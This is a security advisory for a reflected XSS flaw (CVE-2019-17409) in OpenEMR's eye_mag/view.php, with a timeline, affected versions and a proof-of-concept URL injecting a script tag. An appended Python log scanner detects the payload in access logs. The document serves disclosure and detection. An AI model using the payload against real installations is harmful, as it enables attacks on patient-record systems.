CVE-2019-17409
Reflected XSS exists in interface/forms/eye_mag/view.php in OpenEMR 5.x before 5.0.2.1 via the id parameter.
Timeline
- Discovered: October 8, 2019
- Pull Request Issued: October 9, 2019
- Reported: October 9, 2019
- OpenEMR merged pull request: October 9, 2019
- CVE ID issued: October 9, 2019
- OpenEMR Release: October 10, 2019 (5.0.2.1)
Version Details
Fixed-In Version: 5.0.2.1
Affected Versions:
- 5.0.1
- 5.0.1.1
- 5.0.1.2
- 5.0.1.3
- 5.0.1.4
- 5.0.1.5
- 5.0.1.6
- 5.0.1.7
- 5.0.2
Credit
Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)
POC Exploit
Assuming OpenEMR is running on localhost:
http://localhost/openemr/interface/forms/eye_mag/view.php?id=xss%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ca%20href=%22#%22%20faketag=%22
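Detection example (added here, not part of the original advisory or OpenEMR code): a scan of web server access logs for requests to eye_mag/view.php whose decoded id parameter contains HTML metacharacters. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path named in the advisory; the install prefix (/openemr here) varies.
VULN_PATH = "/interface/forms/eye_mag/view.php"
# Characters that let a reflected value close a quoted attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the second carries the advisory's query string
# as a server would receive it (the part after '#' is never sent).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2019:09:12:01 +0000] "GET /openemr/interface/forms/eye_mag/view.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Oct/2019:09:13:44 +0000] "GET /openemr/interface/forms/eye_mag/view.php?id=xss%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ca%20href=%22 HTTP/1.1" 200 5333',
    '192.0.2.10 - - [10/Oct/2019:09:14:02 +0000] "GET /openemr/interface/main/tabs/main.php?id=%3Cb%3E HTTP/1.1" 200 900',
]

def suspicious_id(request_target):
    """Return the decoded id value if it carries HTML metacharacters, else None."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(VULN_PATH):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        # parse_qs decodes once; decode a second time to catch double encoding.
        for candidate in (value, unquote(value)):
            if HTML_META.search(candidate):
                return candidate
    return None

def scan(lines):
    """Return (client address, decoded id) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            found = suspicious_id(match.group(1))
            if found is not None:
                hits.append((line.split()[0], found))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} sent id={value!r}")
```

Hits against installations running a version earlier than 5.0.2.1 are the ones to triage first.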